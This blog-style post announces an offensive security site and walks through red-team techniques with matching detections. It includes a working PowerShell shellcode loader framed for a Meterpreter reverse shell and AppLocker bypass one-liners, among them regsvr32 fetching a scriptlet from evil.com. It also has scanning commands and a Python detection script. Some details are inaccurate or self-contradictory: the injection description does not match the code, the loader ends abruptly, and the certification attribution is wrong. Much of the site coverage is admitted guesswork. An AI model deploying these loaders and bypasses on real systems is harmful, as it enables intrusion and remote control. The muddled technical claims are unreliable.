RadiantSecio Launched: A Deep Dive into Prathamesh P’s New Offensive Security Knowledge Hub + Video


Introduction:

The cybersecurity community thrives on shared knowledge, particularly the kind forged in the crucible of practical, hands-on experience. Prathamesh P., an Offensive Security Professional holding both the rigorous OSEP and CPTS certifications, has launched RadiantSec.io, a personal research site designed to demystify complex security concepts. This platform aims to bridge the gap between theoretical certification material and real-world application by offering detailed writeups on Hack The Box machines, advanced red team tooling, and corresponding blue team detection strategies.

Learning Objectives:

  • Understand how to leverage community-driven research like RadiantSec.io to supplement certification studies (OSEP/CPTS).
  • Learn practical red team techniques and the command-line tools used to execute them.
  • Identify blue team detection strategies to counter specific adversarial tactics.
  • Analyze Windows security mechanisms such as AppLocker through practical research and bypass examples.

You Should Know:

  1. From Certification to Application: OSEP and CPTS Insights
    Prathamesh’s site is positioned as a valuable resource for those pursuing advanced certifications like the Offensive Security Experienced Penetration Tester (OSEP) and the eLearnSecurity Certified Penetration Tester eXtreme (CPTS). These certifications are notorious for moving beyond basic exploit execution into the realm of advanced evasions, Active Directory attacks, and custom tooling. RadiantSec.io provides the “what happened next” that many course materials omit. For example, an OSEP module on bypassing AppLocker might teach the theory; RadiantSec.io provides a practical, step-by-step breakdown of executing that bypass in a lab environment.

  2. Red Team Techniques and Tooling: A Step-by-Step Guide to Process Injection
    A common red team technique covered in advanced certifications is process injection. Based on the context of the site, we can extrapolate a typical guide. Here is a conceptual example of how a post might demonstrate a simple yet effective injection technique using PowerShell, focusing on understanding the Windows API.

What this does: The script allocates executable memory and runs shellcode through Windows API calls reached from PowerShell via .NET P/Invoke; the post frames it as injecting shellcode into a legitimate running process (like explorer.exe) to evade detection.
How to use it: This is for educational purposes in a controlled lab. Compile shellcode for a Meterpreter reverse shell, replace the shellcode variable, and execute it on a test machine.

# PowerShell script for remote process injection (educational purpose)
$code = '
using System;
using System.Runtime.InteropServices;
public class Win32 {
    [DllImport("kernel32")]
    public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    [DllImport("kernel32")]
    public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
    [DllImport("kernel32")]
    public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
}
'

# Compile the C# P/Invoke declarations into the current session
Add-Type $code

# Meterpreter reverse shell shellcode (x64) - replace with your own
[Byte[]] $buf = 0xfc,0x48,0x83,...,0xd5,0x48  # Truncated for brevity

# Allocate memory with RWX permissions
$size = $buf.Length
$addr = [Win32]::VirtualAlloc(0, $size, 0x3000, 0x40)  # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE

# Copy shellcode to the allocated space
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $size)

# Create a thread to execute the shellcode
$thandle = [Win32]::CreateThread(0, 0, $addr, 0, 0, 0)

# Wait for the thread to finish (prevents PowerShell from exiting immediately)

  3. Blue Team Detection Strategies: Hunting for Process Injection
    For every red technique, there is a blue countermeasure. A companion post on the site would detail how to detect the above activity. This moves the site beyond simple “capture the flag” solutions into defensive tradecraft.

Step 1: Monitor API Calls with Sysmon.

Configure Sysmon to log process creation (Event ID 1) and crucial API calls like `VirtualAlloc` and `CreateRemoteThread` (Event ID 8, if using a specific configuration).

Step 2: Analyse with Splunk or Elastic Stack.

Query for events where a parent process (like PowerShell) allocates memory in another process’s address space.

Step 3: Command-line Argument Analysis.

Hunt for suspicious PowerShell one-liners containing base64-encoded strings or patterns matching known injection frameworks. A simple grep-equivalent command in Linux for logs might be:

sudo grep -iE "virtualalloc|createremotethread" /var/log/syslog

Step 4: Implement Windows Defender Attack Surface Reduction (ASR) Rules.
Enable rules specifically designed to block Office applications and scripting engines from making child processes or injecting code.
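The four steps above as one offline triage pass, written as an added example (not code from RadiantSec.io or the post): it applies the Event ID 8 "thread into another process" check from Steps 1 and 2, decodes a PowerShell -EncodedCommand before matching the API names from Step 3, and runs over constructed Sysmon-style records instead of a live Splunk or Elastic index. The dict field names, the SCRIPT_HOSTS list and the sample events are assumptions built for the demo.

```python
"""Toy triage over constructed Sysmon (EID 1/8) and PowerShell 4104 records; added example, not RadiantSec.io code."""
import base64
import re

# API names the loader above relies on, plus the remote-injection variants.
INJECTION_API = re.compile(r"virtualalloc(ex)?|createremotethread|createthread|writeprocessmemory"
                           r"|dllimport\(\s*\"kernel32", re.I)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_FLAG = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe")  # assumed list

def decode_encoded_command(cmdline):
    """Return the UTF-16LE payload of a -EncodedCommand argument, or None if there is none."""
    m = ENCODED_FLAG.search(cmdline)
    try:
        return base64.b64decode(m.group(3)).decode("utf-16-le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def triage(event):
    """Return the names of the detections that fire for one event dict."""
    hits, eid = [], event.get("EventID")
    if eid == 8:  # Sysmon CreateRemoteThread: a script host opening a thread in another process
        src, dst = event.get("SourceImage", "").lower(), event.get("TargetImage", "").lower()
        if src.endswith(SCRIPT_HOSTS) and src != dst:
            hits.append("remote_thread_from_script_host")
    elif eid == 1:  # Sysmon process creation: decode before pattern matching
        cmd = event.get("CommandLine", "")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            hits.append("encoded_powershell_command")
            cmd += " " + decoded  # a grep over the raw command line alone would miss the payload
        if INJECTION_API.search(cmd):
            hits.append("injection_api_in_commandline")
    elif eid == 4104:  # PowerShell script block logging records the de-obfuscated script text
        if INJECTION_API.search(event.get("ScriptBlockText", "")):
            hits.append("injection_api_in_scriptblock")
    return hits
# Constructed sample events, not real telemetry.
ENCODED = base64.b64encode("[Win32]::VirtualAlloc(0,$s,0x3000,0x40)".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"EventID": 4104, "ScriptBlockText": "Add-Type $code; [Win32]::VirtualAlloc(0, $size, 0x3000, 0x40)"},
    {"EventID": 1, "CommandLine": r"notepad.exe C:\Users\analyst\notes.txt"},  # benign control
]

def run_demo(events=SAMPLE_EVENTS):
    """Map each event's index to its detections; the benign event maps to []."""
    return {i: triage(e) for i, e in enumerate(events)}
```

The encoded-command event only matches the API pattern after decoding, which the literal grep in Step 3 would never see.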

4. AppLocker Research: Bypass and Hardening

AppLocker is Microsoft’s application whitelisting solution and a frequent target for bypasses in OSEP. Prathamesh’s research likely covers both how attackers slip through and how defenders lock it down.
– The Attacker’s View: Using installers or trusted binaries (LOLBins) to execute arbitrary code. A classic example is using `msiexec.exe` to run a custom DLL.

msiexec /q /i "C:\path\to\malicious.msi" 

or using `regsvr32` to execute a scriptlet from a remote server.

regsvr32.exe /s /u /i:http://evil.com/file.sct scrobj.dll

– The Defender’s View: Creating proper AppLocker rules that go beyond default paths. This involves auditing current executable usage with `Get-AppLockerFileInformation` and deploying rules via Group Policy that block execution from user-writable paths (like %TEMP%, %APPDATA%).

5. HTB Machine Writeups: A Practical Methodology

Hack The Box writeups are the cornerstone of the site. A quality writeup doesn’t just provide a root flag; it documents the methodology.
– Reconnaissance: Using `nmap -sC -sV -p-` to identify all open ports and services.
– Enumeration: Digging into web applications with `gobuster` or `ffuf` to find hidden directories. Example:

ffuf -u http://<target>/FUZZ -w /usr/share/wordlists/dirb/common.txt

– Exploitation: Analyzing a found vulnerability, such as a SQL injection, and manually crafting the payload to extract data.
– Privilege Escalation: Running automated scripts like `LinPEAS` or `WinPEAS` and then manually investigating the results to find misconfigured services or kernel exploits.

What Undercode Say:

  • Community-Driven Research is the New Textbook: RadiantSec.io exemplifies how the cybersecurity industry evolves. Official certifications provide the foundation, but community research provides the current tactics, techniques, and procedures (TTPs) that are relevant in the field today. It is an essential supplement to formal training.
  • The Red/Blue Symbiosis: The most valuable aspect of this new platform is its intent to cover both red team techniques and blue team detection. This holistic approach is critical. Understanding how an attack works from the offensive side allows a defender to build far more effective and resilient detections than simply chasing Indicators of Compromise (IOCs).
  • Depth Over Breadth: Focusing on AppLocker research, specific certifications, and detailed writeups suggests a commitment to depth. This is more valuable than a surface-level blog covering dozens of topics. For professionals, deep dives into specific security controls like AppLocker are invaluable for understanding the nuances of both breaking and fixing them.

Prediction:

Resources like RadiantSec.io will increasingly become the primary source of truth for working professionals. As certification materials lag behind the rapidly shifting threat landscape (especially with the rise of AI-generated malware and advanced social engineering), personal research sites and communities will become the de facto standard for staying current. We will likely see a “democratization” of advanced offensive tradecraft, forcing defensive tooling to become more adaptive and behavior-based rather than relying on static signatures. This will accelerate the arms race, requiring continuous learning and a more profound understanding of core system internals from all security practitioners.

Reported By: Prathamesh Praghanmol – Hackers Feeds